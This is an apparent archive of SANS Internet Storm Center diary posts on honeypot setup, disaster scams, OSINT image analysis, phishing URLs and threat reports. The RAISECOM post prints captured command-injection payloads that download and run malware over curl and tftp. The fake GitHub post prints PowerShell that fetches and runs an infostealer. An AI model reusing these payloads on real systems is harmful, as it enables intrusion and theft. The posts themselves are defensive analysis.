Tag Archives: SANS

Kickstart Your DShield Honeypot [Guest Diary], (Thu, Oct 3rd)

This post was originally published on this site

[This is a Guest Diary by Joshua Gilman, an ISC intern as part of the SANS.edu BACS program]

Introduction

Setting up a DShield honeypot is just the beginning. The real challenge lies in configuring all the necessary post-installation settings, which can be tedious when deploying multiple honeypots. Drawing from personal experience and valuable feedback from past interns at the Internet Storm Center (ISC), I developed DShieldKickStarter to automate this often repetitive and time-consuming process.

What is DShieldKickStarter?

DShieldKickStarter is not a honeypot deployment tool. Instead, it’s a post-installation configuration script designed to streamline the setup of a honeypot environment after the DShield honeypot software has been installed. The script ensures that honeypots run efficiently with minimal manual effort by automating essential tasks such as setting up log backups, PCAP capture, and installing optional analysis tools.

Key Features of DShieldKickStarter

•    Automated Log Backups: The script organizes, compresses, and password-protects honeypot logs to prevent accidental execution of malicious files.
•    PCAP Capture Setup: Using tcpdump, it captures network traffic while excluding specific ports, ensuring relevant data is logged.
•    Optional Tool Installation: Cowrieprocessor and JSON-Log-Country are included as optional tools. Both were invaluable during my internship for streamlining data analysis.
•    Helpful for Multiple Honeypots: This script is handy when managing several honeypots. It saves time by automating repetitive setup tasks.

Step-by-Step Breakdown

The script automates several critical tasks:
1.    Creating Directories and Setting Permissions 
            Ensures the necessary directory structures for logs, backups, and PCAP data are in place, with proper permissions to secure sensitive files.
2.    Installing Required Packages 
             Installs essential tools such as tcpdump, git, and python3-pip, streamlining the log and packet capture setup.
3.    Configuring Log Rotation and Backups 
             Automatically rotates logs and stores them with password protection. PCAP files and honeypot logs are archived daily, and older backups are cleaned to save space.
4.    Automating PCAP Capture 
             Sets up tcpdump to capture network traffic, excluding predefined ports to ensure relevant data capture. The process is automated via cron jobs.
5.    Optional Tool Integration 
             The script optionally installs cowrieprocessor and JSON-Log-Country, two tools that were extremely helpful during my internship. These streamline log processing and help categorize attack data for further analysis.
6.    SCP Option for Off-Sensor Backup 
             If enabled, the script supports SCP transfers to a remote server, automating the secure transfer of backups for off-sensor storage.

Who Benefits from This?

•    ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection.
•    Cybersecurity Professionals: This tool's time-saving features can benefit anyone interested in setting up a DShield honeypot and contributing to threat intelligence efforts.

Tool Showcase

1. CowrieProcessor

Description

CowrieProcessor is a Python tool designed to process and summarize Cowrie logs, allowing for more accessible and detailed analysis. Cowrie logs can contain overwhelming data as they track every interaction with the honeypot. CowrieProcessor condenses this data into a readable format, focusing on crucial elements like session details, IP addresses, commands entered by attackers, and malicious files downloaded during the session.

Usage and Benefits

The tool automates the parsing of Cowrie logs, providing a summary that includes key metrics such as session duration, attacker IPs, and the commands used during each attack. This is useful for quickly understanding attacker behavior without sifting through massive raw log files. With this, security teams can focus on actionable insights, such as blocking specific IPs or analyzing downloaded malware.

Screenshot Explanation

In the attached screenshot, CowrieProcessor provides a detailed view of a session from an attack on the honeypot. It shows session details, commands attempted by the attacker, and files downloaded, such as the malicious authorized_keys file. The easy-to-read output from CowrieProcessor highlights the attack flow, giving you insight into the malicious actor’s intentions.


CowrieProcessor output showing session details and malicious activities detected by the honeypot.

DShield SIEM (ELK)

Description

While DShield SIEM (ELK) is not included in the script, it is crucial in further analysis and data visualization for honeypots. ELK (Elastic Stack) enables the collection, processing, and real-time visualization of honeypot data. It provides a centralized platform to track attacker behavior, detect patterns, and generate insights through interactive dashboards.

Usage and Benefits

Using ELK, you can monitor key metrics such as the most frequent attacker IPs, session types, and the commands attackers use. ELK dashboards also provide the ability to create custom queries using Kibana Query Language (KQL), which allows you to filter logs by specific attributes like failed logins, session durations, or malicious file downloads.


ELK dashboard showing attack data, top IP addresses, session activity, and trends over time.

Screenshot Explanation

The attached screenshot shows a detailed ELK dashboard summarizing honeypot data. On the left side, the "Top 50 IP" table displays the most active attacking IPs, while the center pie charts break down the types of logs (honeypot, webhoneypot, etc.) and session activity. The bar chart on the right visualizes Cowrie activity over time, helping analysts track attack patterns. KQL can filter this data even further, focusing on specific attacks or malicious behaviors.

KQL (Kibana Query Language)

One of the standout features of ELK is the ability to leverage KQL for deep-dive investigations. For instance, if you want to search for all failed login attempts, you can use a KQL query like:
event.outcome: "login.failed"

This query will instantly filter your logs, allowing you to pinpoint where and when login attempts failed. Another useful query might be filtering by source IP to track all actions from a particular attacker:
source.ip: "45.148.10.242"

With KQL, you can quickly analyze data across large volumes of logs, making it easy to detect anomalies, potential threats, or patterns in attacker behavior.

[1] https://github.com/DShield-ISC/dshield
[2] https://github.com/iamjoshgilman/DShieldKickStarter
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://github.com/justin-leibach/JSON-Log-Country
[5] https://github.com/bruneaug/DShield-SIEM
[6] https://www.elastic.co/guide/en/kibana/current/kuery-query.html
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security related Docker containers, (Wed, Oct 2nd)

This post was originally published on this site

Over the last 9 months or so, I've been putting together some docker containers that I find useful in my day-to-day malware analysis and forensicating. I have been putting them up on hub.docker.com and decided, I might as well let others know they were there. In a couple of cases, I just found it easier to create a docker container than try to remember to switch in and out of a Python virtualenv. In a couple of other cases, it avoids issues I've had with conflicting version of installed packages. In every case, I'm tracking new releases so I can update my containers when new releases come out and I usually do so within a couple of days of the new release. The ones that I have up at the moment are the following:

Hurricane Helene Aftermath – Cyber Security Awareness Month, (Tue, Oct 1st)

This post was originally published on this site

For a few years now, October has been "National Cyber Security Awareness Month". This year, it is a good opportunity for a refresher on some scams that tend to happen around disasters like Hurricane Helene. The bigger the disaster, the more attractive it is to scammers.

Fake Donation Sites

Hurricane Katrina was the first event that triggered many fake donation websites. Since then, the number of fake donation websites has decreased somewhat, partly due to law enforcement attention and hopefully due to people becoming more aware of these scams. These scams either pretend to be a new charity/group attempting to help or impersonate an existing reputable charity. People in affected areas need help. Please only donate to groups you are familiar with and who were active before the event.

AI Social Media Posts

I believe these posts are mostly created to gain social media followers, maybe with the intent to later reel them into some scam. They often post dramatic images created with AI tools or copied from legitimate accounts. Some may just be interested in some of the monetization schemes social media and video sites are participating. Do not amplify these accounts. Strictly speaking, they are not "fake news," but legitimate news sources who go out to take pictures and gather information need exposure more than these fake accounts. Often, the fake accounts will contribute to at least exaggeration of the impact of the event and reduce, in some cases, the credibility of legitimate recovery efforts

Malware

Attackers may use the event as a pretense to trick victims into opening attachments. In the past, we have seen e-mails and websites that spread malware claiming to include videos or images of the event. These attachments turn out to be executables installing malware.

Fake Assistance Scams

In the aftermath of a disaster, organizations often provide financial aid through loans. Scammers will apply for these loans using stolen identities traded online. If it may take several months for the victim to become aware of this, they often face a request to repay the loan. Sadly, there is not much, if anything, to protect yourself from these scams. The intend of the assistance is to be quick and unburocratic and to "sort things out later". You may have to prove that someone else used your information to apply for the loan.

"Grandparent Scam"

In this scam, a caller will pretend to be a relative or close friend, asking for money. These scams have improved because they can often identify individuals in the disaster area and use them as a pretense to extort money. The caller may claim to be the individual (often they use SMS or other text messaging services), or they may claim to represent a police department or a hospital. Do not respond to any demands for money. Notify your local police department. If you are concerned, try to reach out to the agency calling you using a published number (note that Google listings can be fake). Due to the conditions in affected areas, the local authorities may be unable to respond. Your local law enforcement agency may be able to assist. They often have a published "non-emergency" number you can use instead of 911. Individuals in the affected area may not be reachable due to spotty power and cell service availability.

Final Word

Please let us know if we missed anything. A final word on some disaster preparedness items with an "IT flavor":Broken high voltage power line wire touching cable TV and phone lines.

  1. Have a plan to get out, and if you can get out: get out. You should not stay in the affected area unless you are part of the recovery effort.
  2. Cellular networks fail. Cellular networks tend to work pretty well during smaller disasters, but they need power, towers, and other infrastructure, which will fail in large-scale disasters. Satellite connectivity quickly becomes your only viable option (if you have power). If you have a phone with satellite emergency calling (for example, a recent iPhone), they offer a "demo mode" to familiarize you with the feature.
  3. If you are lucky to already have a Starlink setup, bring the antenna inside before the storm and disconnect the equipment from power to avoid spikes destroying it.
  4. Disconnect as many electric devices from outlets as possible during a power outage (or before power outages are expected). Power outages often come with power spikes and other irregular power events that can destroy sensitive electronics. Do not plug them back in until power is restored and stable.
  5. Even a downed phone or cable TV line can be energized. You may not see the high voltage line that is also down and touches the cable TV line. I took the picture on the right this weekend in my neighborhood of a high-voltage line touching the cable TV and phone line.

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Tool update: mac-robber.py and le-hex-to-ip.py, (Mon, Sep 30th)

This post was originally published on this site

One of the problems I've had since I originally wrote mac-robber.py [1][2][3] seven years ago is that because of the underlying os.stat python library we couldn't get file creation times (B-times). Since the release of GNU coreutils 8.32 (or so), the statx() call has been available on Linux to provide the B-time, but Python out of the box doesn't yet support that call. Recently, though, I did some searches and discovered that for several years there has actually bin a pip package called pystatx that exposes the statx() call and allows us to get the B-time. So, I updated the script. It now tries to import statx and if it succeeds (probably only on relatively recent Linux distros where the pip package has been installed) it can now provide B-times. I also adjusted the formatting so the script will now give microsecond instead of millisecond resolution. I will probably write a python version of mactime at some point so that we can actually take advantage of the additional resolution.

OSINT – Image Analysis or More Where, When, and Metadata [Guest Diary], (Wed, Sep 25th)

This post was originally published on this site

[This is a Guest Diary by Thomas Spangler, an ISC intern as part of the SANS.edu BACS program]

A picture is worth a thousand words, as the saying goes. Using open-source information and basic image analysis can be an valuable tool for investigators. The purpose of this blog is to demonstrate the power of image analysis and the associated tools for open-source intelligence (OSINT). Having recently completed SANS SEC497, I was inspired to share the power of image analysis in providing valuable information for investigations. This post will provide a step-by-step approach using a random image [1] pulled from the internet.

SAFETY FIRST

Always scan a file or URL prior to retrieving a target image. This action is particularly useful when retrieving information from suspicious or unknown websites. A tool like VirusTotal [2] makes this step very easy.

First, select your scan type:  File, URL, or Search.  In the case of a file, it can be dragged and dropped on the screen.

In this case, I used a known PDF file to generate the sample result shown below.

Now we are clear to proceed with the image analysis…

TARGET IMAGE

Our target image was randomly selected from the NY Times website.

Credit: Filip Singer, EPA

WHERE WAS THIS IMAGE TAKEN

A natural first question might be:  where this image was taken?  OSINT analysts use many tools, including image analysis, to answer questions like this one.   As you will see, image analysis alone cannot solve this question.  Other tools like Google searches, translation tools, and metadata can be combined with image analysis to provide discrete clues that integrate together into an answer.

Potentially identifiable or unique markings…

In looking for image clues, focus on context (e.g. bridge collapse and flooding), unique markers (e.g. signs, buildings, bridges), and geography.

With these clues in hand, we can now use tools like Google Lens [3] and Yandex [4] (if your organization or agency permits its use because of the Russian origin) for reverse image lookups and text-based searches.  While most people think of Google searches in terms of text, Google Lens is the image search equivalent, which can be used to find additional clues.  In this case, I used Google Lens with the original image and the image clues mentioned above to find relevant matches.  Below are the Google Lens matches obtained from a search on the original image:

From the Google Lens results, the images from www.lusa.pt  and TAG24 seem to be similar matches.  Note the TAG24 description indicated Dresden and is written in German.  Upon visiting the TAG24 website [5], we find a different image of the same location and an article in German.  

Using another important OSINT tool, Google Translate, we can translate some of the text to English in order to find the exact bridge and location in question.

Voila…Carola Bridge.  A simple Google text search on Carola Bridge turns up an article from Euronews [6] that confirms the image location at the Carola Bridge in Dresden, Germany.  We can also use a Google Dork…maps:carola bridge…to find a map of the location:

WHEN

From the Euronews article, we also know that the bridge collapsed sometime between 11-12 September 2024 in the middle of the night.

An AP Article [7] that also turned up in the previous google search indicated that “crews were alerted around 3am”.  And, an Engineering News Record article [8] confirms the collapse occurred on 11 September 2024. A Deutche Welle article confirms that demolition of the fallen structure began on 13 September 2024.

We can conclude that this picture was taken sometime between 3am local time on 11 Sept 2024 and daylight hours on 13 Sept 2024.  With further investigation, using Google Street View and similar tools, we could have probably narrowed the timeline down even further.

METADATA

I wanted to touch on one other important topic…metadata.  Metadata (as shown in the details below from the reference image) presents interesting information such as location, size, imaging device, date, and time for the image in question.  Original images, videos, and files usually contain a treasure chest of information in the form of metadata.  Using Exiftool [10], the following data is returned on the target file in this blog:

It includes some basic information about the image size, encoding process, etc., but with original images, location, camera type, date, and time will all likely be included.  These pieces of metadata could drastically speed up any OSINT investigation.

CONCLUSION

In conclusion, imagery can be an important starting point for OSINT investigations.  However, more cyber tools than just image analysis must be employed to answer some basic questions like who, where, and when.  In certain cases, an analyst needs to pay close attention to their own attribution (“being found”) when conducting an investigation.  Instead of using live web searches from a local machine, an analyst may need to use sock puppet accounts, VPN protection, and/or cloud-based hosts and even tools like Google Cache and the Wayback Machine for archived web sites to protect their identities and the fact that a target is being investigated.

Thank you to SEC497 instructor Matt Edmondson for peaking my interest in OSINT and the skills developed during the course.

[1] nytimes.com
[2] virustotal.com
[3] https://chromewebstore.google.com/detail/download-google-lens-for/miijkofiplfeonkfmdlolnojlobmpman?hl=en
[4] Yandex.com/images
[5] https://www.tag24.de/thema/naturkatastrophen/hochwasser/hochwasser-dresden/hochwasser-in-dresden-pegel-prognosen-werden-sich-bestaetigen-3317729#google_vignette
[6] https://www.euronews.com/my-europe/2024/09/12/major-bridge-partially-collapses-into-river-in-dresden
[7] https://apnews.com/article/dresden-germany-bridge-collapse-carola-bridge-ad1ebf71f396d8984d2e79f9e6ba3f06
[8] https://www.enr.com/articles/59283-dramatic-bridge-failure-surprises-dresden-germany-officials
[9] https://www.dw.com/en/dresden-rushes-to-remove-collapsed-bridge-amid-flood-warning/a-70215802
[10] https://exiftool.org/
[11] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Exploitation of RAISECOM Gateway Devices Vulnerability CVE-2024-7120, (Tue, Sep 24th)

This post was originally published on this site

image of SOH/Enterprise Gateway Raisecom MSG2200 series, msg2100E series.Late in July, a researcher using the alias "NETSECFISH" published a blog post revealing a vulnerability in RASIECOM gateway devices [1]. The vulnerability affects the "vpn/list_base_Config.php" endpoint and allows for unauthenticated remote code execution. According to Shodan, about 25,000 vulnerable devices are exposed to the internet.

With a simple proof of concept available, it is no surprise that we aseethe vulnerability exploited. The first exploits were detected by our sensors on September 1st

The graph above shows the number of attacks for this vulnerability we saw daily.

There are two distinct payloads that we have seen used so far:

 /vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20rm%20-rf%20tplink%3B%20curl%20http%3A//[redacted]/tplink%20--output%20tplink%3B%20chmod%20777%20tplink%3B%20./tplink%20raisecom%60

This decoded to the following script:

cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

The second URL looks quite similar

/vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20tftp%20-g%20-r%20ppc%20141.98.11.136%2069%3B%20chmod%20777%20ppc%3B%20./ppc%20raisee%60

Decoding to:

cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

Interestingly, the second attempt uses TFTP, not HTTP, to download the malware. Sadly, neither file was available at the time I am writing this. But based on the naming of the files, it is fair to assume that this is one of the regular botnets hunting for vulnerable routers.

I was not able to find details about this vulnerability or patches on RAISECOM's website [2].

[1] https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707
[2] https://en.raisecom.com/product/sohoenterprise-gateway


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Phishing links with @ sign and the need for effective security awareness building, (Mon, Sep 23rd)

This post was originally published on this site

While going over a batch of phishing e-mails that were delivered to us here at the Internet Storm Center during the first half of September, I noticed one message which was somewhat unusual. Not because it was untypically sophisticated or because it used some completely new technique, but rather because its authors took advantage of one of the less commonly misused aspects of the URI format – the ability to specify information about a user in the URI before its "host" part (domain or IP address).

RFC 3986 specifies[1] that a “user information” string (i.e., username and – potentially – other contextual data) may be included in a URI in the following format:

[ userinfo "@" ] host [ ":" port ]

In this instance, the threat actors used the user information string to make the link appear as if it was pointing to facebook.com, while it actually lead to an IPFS gateway[2] ipfs.io.

As you can see in the previous image, the full target for the link was:

hxxps[:]//facebook.com+login%3Dsecure+settings%3Dprivate@ipfs[.]io/ipfs/bafybeie2aelf7bfz53x7bquqxa4r3x2zbjplhmaect2pwxiyws6rlegzte/sept.html#[e-mail_address_of_recipient]

This approach is not new – threat actors have been misusing the user information string for a long time, sometimes more intensively, sometimes less so[3] – nevertheless, it is something that can be quite effective if recipients aren’t careful about the links they click.

This specific technique is also only seldom mentioned in security awareness courses, and since I was recently asked to “adding it in” one such course by a customer, I thought that the concept of effective security awareness building in relation to phishing deserved some small discussion.

The truth is that even if this technique is not covered in a security awareness course, this – by itself – doesn’t necessarily mean that such a course is useless. In fact, to my mind, it might be more effective than a course which includes it. Bear with me here…

It is undeniable that less can sometimes mean more when it comes to security awareness building. During an initial/on-boarding security training or a periodic security awareness training, we only have a limited time to teach non-specialists about a very complex field. This means that we need to necessarily cover the topic in as effective a manner as possible. And, when it comes to phishing, I don’t think that anyone would disagree that there are many more techniques than one can reasonable cover in the context of a one or two hour course (in fact, covering just a few of them is enough for a technical webinar[4]). So, this is one area where we probably shouldn’t try to “catch them all”. Rather, we should try to focus on those aspects of phishing that are common to most techniques, since these can help people to identify that something is wrong regardless of the specific approach the attacker might have taken. Which brings us back to the use of the “at” sign and the ability of threat actors to prepend an arbitrary user information string ahead of the host part of the URI.

Since this isn’t (by far) the only technique depending on users looking first at the beginning of a link (e.g., think of a threat actor using a well-chosen fifth or sixth level domain in their messages , such as “https://isc.sans.edu.untrustednetwork.net/random” to make it appear as if the link goes to isc.sans.edu), it might make more sense not to include information about the technique that uses the “at” sing specifically in a security awareness course, but rather to discuss how to find the domain part of any link by looking for the first standalone slash (so, not counting the two in http(s)://), and how to check the domain right to left to make sure that it is trustworthy, since this would cover any phishing technique where the link used would point to an untrustworthy domain.

This doesn’t mean that one can’t/shouldn’t mention the details of how threat actors can misues user information strings in URLs in – for example – a security awareness newsletter, however it probably isn’t something that we should devote time and space to during a 60 or 90-minute initial or periodic security awareness course for all employees of an organization.

[1] https://datatracker.ietf.org/doc/html/rfc3986#section-3.2
[2] https://isc.sans.edu/diary/30744
[3] https://www.malwarebytes.com/blog/news/2022/05/long-lost-symbol-gets-new-life-obscuring-malicious-urls
[4] https://www.youtube.com/watch?v=Fb2Z3bw-oJ8

———–
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Fake GitHub Site Targeting Developers, (Thu, Sep 19th)

This post was originally published on this site

Our reader "RoseSecurity" forwarded received the following malicious email:

Hey there!

We have detected a security vulnerability in your repository. Please contact us at https:[//]github-scanner[.]com  to get more information on how to fix this issue.

Best regards,
Github Security Team

GitHub has offered free security scans to users for a while now. But usually, you go directly to GitHub.com to review results, not a "scanner" site like suggested above.

The github-scanner website first displays what appears to be some form of Captcha to make sure you are "Human" (does this exclude developers?)

Clicking on "I'm not a robot" leads to this challenge screen:

Not your normal Captcha! So what is going on?

JavaScript on the website copied an exploit string into the user's clipboard. The "Windows"+R sequence opens the Windows run dialog, and the victim is enticed to execute the code. The script:

powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "? ''I am not a robot - reCAPTCHA Verification ID: 93752"

This simple and effective script will download and execute the "download.txt" script. The victim will likely never see the script. Due to the size of the run dialog, the victim will only see the last part of the string above, which may appear perfectly reasonable given that the victim is supposed to prove that they are human

download.txt contains:

$webClient = New-Object System.Net.WebClient
$url1 = "https:// github-scanner [.]com/l6E.exe"
$filePath1 = "$env:TEMPSysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath  $env:TEMPSysSetup.exe

This will download "l6E.exe" and save it as "SysSetup.exe". Luckily, l6E.exe has pretty good anti-virus coverage. On my test system, Microsoft Defender immediately recognized it [1] . It is identified as "Lumma Stealer", an information stealer. The domain is recognized by some anti-malware, but sadly not yet on Google's safe browsing blocklist.

Yes another case of Infostealers going after developers!

[1] https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.